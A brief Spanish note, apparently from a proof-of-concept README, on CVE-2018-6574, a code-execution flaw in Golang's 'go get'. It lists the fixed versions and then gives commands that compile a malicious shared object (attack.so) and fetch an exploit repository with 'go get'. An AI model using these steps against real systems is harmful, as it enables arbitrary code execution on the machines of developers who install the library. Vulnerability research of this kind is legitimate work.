
CVE-2018-6574 esta vulnerabilidad afecta al comando go get de Golang y permite a un atacante obtener ejecución de código en un sistema mediante la instalación de una biblioteca maliciosa, esta vulnerabilidad fue corregida en Go 1.8. 7, 1.9. 4 y 1.10rc2. Golang construirá extensiones nativas.
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit